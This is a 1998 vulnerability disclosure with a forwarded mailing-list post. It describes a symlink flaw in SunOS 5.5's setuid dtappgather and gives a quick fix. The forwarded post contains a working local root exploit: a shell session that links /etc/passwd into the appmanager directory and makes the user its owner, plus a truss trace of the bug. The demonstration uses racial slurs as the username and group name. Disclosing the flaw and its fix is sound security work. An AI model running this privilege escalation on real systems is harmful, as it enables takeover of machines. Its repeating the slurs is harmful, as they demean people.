Buggy program: /usr/dt/bin/dtappgather Description of the problem: Local users can change the ownership of any file, thus gaining root priviledges. This happens because "dtappgather" does not check if the file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and happily chown()s it to the user. When CERT released advisory CA-98.02 about /usr/dt/bin/dtappgather, I played a little with dtappgather and discovered the problem above, but I thought that patch 104498-02 corrects it, as described in SUN's section of 98.02. When I applied the patch, I realised that it was still possible to gain root privs. Systems Affected: *At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to make the necessary link. On the other hand, in SunOS 5.5* this dir has mode 777, so you can easily make the link or even unlink/rename the file "generic-display-0" if exists owned by another user. Quick Fix: chmod -s /usr/dt/bin/dtappgather The Exploit: The forwarded exploit was initially posted to hack.gr's security mailing list: "haxor". Hack wisely, Mastoras /* * Computer Engineering & Informatics Department, Patras, Greece * Mastor Wins, Fatality! http://www.hack.gr/users/mastoras */ ---------- Forwarded message ---------- Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET) From: Mastoras <mastoras@papari.hack.gr> Reply-To: haxor@hack.gr To: haxor@papari.hack.gr, Undisclosed recipients: ; Subject: [HAXOR:11] dtappgather exploit Hello, I suppose you have learnt about CERT's advisory on dtappgather program. Well, here's the exploit: nigg0r@host% ls -l /etc/passwd -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0 nigg0r@host% dtappgather MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists nigg0r@host% ls -l /etc/passwd -r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd nigg0r@host% echo "nigg0r wins! Fatality!" | mail root it would be easy to find the exploit if you had read CERT's advisory. the following steps were enough.. % cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies] % truss -o koko ./dtappgather % more koko [ shity ld things ] chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0 chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0 [ shitty things ] I hope this was not too lame or well-known :-) Seeya, mastoras